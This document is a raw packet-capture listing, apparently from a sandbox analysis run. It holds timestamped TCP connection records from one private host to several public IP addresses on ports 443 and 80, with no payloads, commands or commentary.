                                                                                                                                          Nov 18, 2024 06:47:27.316935062 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.317017078 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.317074060 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.317074060 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.317087889 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.317173958 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.317245007 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.317401886 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.317413092 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.317467928 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.327028990 CET55130443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.421973944 CET44355130104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.422080994 CET44355130104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.422123909 CET55130443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.423053980 CET55130443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.423075914 CET44355130104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.431155920 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:27.431545019 CET55132443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.431585073 CET44355132104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.431653023 CET55132443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.431932926 CET55132443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.431945086 CET44355132104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.433438063 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.433614016 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.433696985 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.433747053 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.433764935 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.433805943 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.433955908 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.434259892 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.434307098 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.434320927 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.434758902 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.434822083 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.434829950 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.435101986 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.435162067 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.435169935 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.435280085 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.435334921 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.435348034 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.435683012 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.435731888 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.435739994 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.435951948 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.436003923 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.436017036 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.436214924 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.436335087 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.436379910 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.436388969 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.486018896 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.486037970 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.518054008 CET4968080192.168.2.16192.229.211.108
                                                                                                                                          Nov 18, 2024 06:47:27.534006119 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.551126957 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.551218987 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.551326036 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.551332951 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.551350117 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.551409960 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.551422119 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.551465034 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.551551104 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.551558971 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.552130938 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.552174091 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.552176952 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.552191019 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.552226067 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.552233934 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.553318024 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.553384066 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.553395033 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.553797960 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.553843975 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.553847075 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.553858042 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.553940058 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.554517031 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.554568052 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.554606915 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.554606915 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.554620981 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.555332899 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.555392027 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.555402040 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.555499077 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.555747032 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.555874109 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.556576014 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.556624889 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.556632996 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.556643963 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.556684971 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.557442904 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.557492018 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.557526112 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.557538033 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.557549000 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.598051071 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.668935061 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.669014931 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.669167042 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.669214964 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.669696093 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.669753075 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.670258045 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.670314074 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.670316935 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.670332909 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.670371056 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.670835018 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.670888901 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.670898914 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.670959949 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.671003103 CET55129443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.671015978 CET44355129104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.673712015 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.673765898 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.673842907 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.674482107 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.674499035 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.691637993 CET49711443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:27.735348940 CET44349711188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.829236984 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.829272985 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.829332113 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.829524040 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:27.829539061 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.829936028 CET44349711188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.830013990 CET44349711188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.830092907 CET49711443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:27.830643892 CET49711443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:27.830682993 CET44349711188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.839237928 CET55135443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:27.839292049 CET4435513535.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:27.839355946 CET55135443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:27.839696884 CET55135443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:27.839715958 CET4435513535.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.028584957 CET44355132104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.028903008 CET55132443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.028925896 CET44355132104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.029243946 CET44355132104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.029659986 CET55132443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.029726028 CET44355132104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.029853106 CET55132443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.075335026 CET44355132104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.109826088 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.109966993 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:28.112859011 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:28.112865925 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.113240004 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.123074055 CET4968080192.168.2.16192.229.211.108
                                                                                                                                          Nov 18, 2024 06:47:28.155054092 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:28.164679050 CET44355132104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.164865971 CET44355132104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.164942026 CET55132443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.165399075 CET55132443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.165420055 CET44355132104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.183784008 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:28.227340937 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.292269945 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.292643070 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.292680025 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.293148041 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.293734074 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.293827057 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.293893099 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.335339069 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.431739092 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.431802988 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.431834936 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.431857109 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.431885958 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.431967974 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.432096958 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.432316065 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.432349920 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.432363033 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.432370901 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.432451963 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.432605028 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.432933092 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.433192015 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.433197975 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.456914902 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.457225084 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.457251072 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.457583904 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.457971096 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.458029032 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.458242893 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.458242893 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.458267927 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.462552071 CET4435513535.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.462810993 CET55135443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:28.462842941 CET4435513535.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.464318037 CET4435513535.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.464389086 CET55135443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:28.469947100 CET55135443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:28.470036030 CET4435513535.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.470134974 CET55135443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:28.470170021 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.470200062 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.470207930 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.470220089 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.470246077 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.470266104 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:28.470288038 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.470315933 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:28.470350027 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:28.470784903 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.470861912 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:28.470864058 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.470902920 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:28.474078894 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.483952045 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:28.483971119 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.483987093 CET55131443192.168.2.1620.12.23.50
                                                                                                                                          Nov 18, 2024 06:47:28.483994007 CET4435513120.12.23.50192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.511353016 CET4435513535.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.522047997 CET55135443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:28.522067070 CET4435513535.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.551260948 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.551361084 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.551395893 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.551459074 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.551518917 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.551559925 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.551608086 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.551615953 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.551656961 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.551855087 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.552200079 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.552254915 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.552262068 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.552566051 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.552598953 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.552618027 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.552624941 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.552671909 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.552752018 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.553570986 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.553611994 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.553636074 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.553643942 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.553683996 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.553689957 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.553713083 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.553760052 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.553767920 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.554374933 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.554425955 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.554433107 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.569050074 CET55135443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:28.601042032 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.611932039 CET4435513535.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.612307072 CET55135443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:28.612379074 CET4435513535.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.612443924 CET55135443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:28.613006115 CET55136443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:28.613044024 CET4435513635.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.613128901 CET55136443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:28.613400936 CET55136443192.168.2.1635.190.80.1
                                                                                                                                          Nov 18, 2024 06:47:28.613415956 CET4435513635.190.80.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.638398886 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.638448954 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.638521910 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.638542891 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.638565063 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.638626099 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.638626099 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.638641119 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.639070034 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.639116049 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.639122963 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.639467001 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.639892101 CET55134443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.639899969 CET44355134104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.670228004 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.670412064 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.670445919 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.670475960 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.670526981 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.670855999 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.670934916 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.671000957 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.671084881 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.671103954 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.671152115 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.671205997 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.671219110 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.671708107 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.671782970 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.671794891 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.672348976 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.672385931 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.672404051 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.672419071 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.672450066 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.672727108 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.672795057 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.672807932 CET44355133104.18.94.41192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:28.672875881 CET55133443192.168.2.16104.18.94.41
                                                                                                                                          Nov 18, 2024 06:47:28.673326969 CET44355133104.18.94.41192.168.2.16
